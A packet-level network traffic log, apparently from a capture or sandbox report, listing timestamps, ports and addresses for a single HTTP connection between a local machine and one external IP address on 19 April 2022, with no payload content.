Apr 19, 2022 16:44:44.810056925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.810261011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.810313940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.810492992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.810545921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.810709000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.810719013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.810890913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.810951948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811005116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.811086893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811139107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.811188936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811312914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811393023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811441898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.811511993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811563969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.811624050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811755896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811830044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.811896086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.812041044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812120914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812181950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.812233925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812293053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.812356949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812479019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812573910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812647104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.812716961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812768936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.812834024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812861919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.812985897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813038111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.813097954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813149929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.813236952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813374043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813445091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813503027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.813591003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813654900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.813746929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813766956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813819885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.813880920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.813999891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814095020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814146042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.814243078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814296007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.814403057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814479113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814557076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814614058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.814682961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.814759016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.814837933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815000057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815078020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815080881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.815164089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815258980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815304995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.815359116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815406084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.815535069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815679073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815742016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815803051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.815932035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.815949917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816021919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.816077948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816138983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.816155910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816273928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816400051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816464901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.816518068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816581964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.816632986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816718102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816827059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.816916943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.816968918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817034960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.817045927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817198992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817265987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.817276001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817414999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817497015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817553043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.817641020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817713022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.817764997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817878008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.817931890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.817985058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818114042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818191051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.818205118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818321943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818372965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.818439960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818517923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818574905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.818639994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818763971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818907022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.818968058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.818972111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.819026947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.819120884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.819186926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.819364071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.819425106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.819566011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.819637060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.819881916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.819997072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.820117950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.820177078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.820281982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.820332050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.820518017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.820760012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.820995092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.821068048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.821120024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.821168900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.821240902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.821439028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.821717024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.821757078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.821796894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.821849108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.821912050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822016001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822113991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822173119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.822283983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822335005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.822341919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822478056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822566986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822618008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.822681904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822738886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.822789907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.822920084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823065042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823121071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.823159933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823223114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.823275089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823384047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823502064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823565006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.823585033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823632002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.823734045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823856115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.823987007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824037075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.824044943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824095964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.824146986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824285030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824424982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824482918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.824498892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824552059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.824618101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824755907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824862957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.824919939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.824985981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825057030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825093985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.825185061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825241089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.825368881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825429916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825520992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825577021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.825654030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825710058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.825778961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825894117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.825947046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.825982094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826096058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826231956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826294899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.826348066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826395988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.826481104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826539993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826611042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.826667070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826767921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826874971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.826922894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.827020884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827078104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.827117920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827230930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827361107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827419996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.827450991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827506065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.827557087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827723980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827773094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827824116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.827893019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.827944994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.828032970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828138113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828241110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828298092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.828361034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828411102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.828449965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828567028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828722954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828787088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.828913927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.828974962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.829155922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.829397917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.829675913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.829730988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.829924107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830327988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830393076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.830415010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830467939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.830610991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830727100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830821037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830883026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.830912113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.830972910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.831124067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831223965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831291914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831348896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.831402063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831453085 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.831597090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831614971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831738949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831794977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.831814051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.831880093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.831934929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832041025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832201004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832252026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.832262993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832309961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.832391977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832492113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832642078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832689047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.832762957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.832809925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.832842112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833004951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833102942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833173037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.833244085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833296061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.833303928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833404064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833561897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833611012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.833730936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833761930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833813906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.833868027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.833929062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.833988905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834089041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834208965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834264040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.834322929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834367990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.834634066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834664106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834714890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834764957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.834846973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.834897995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.834953070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835005045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835165024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835216045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.835235119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835287094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.835354090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835480928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835552931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835608959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.835686922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835741043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.835803986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.835927963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836036921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836086035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.836169004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836221933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.836280107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836406946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836514950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836560011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.836601019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836654902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.836695910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836813927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836946964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.836994886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.837049007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.837096930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.837167025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.837270021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.837385893 CEST	80	49758	45.135.48.153	192.168.2.4
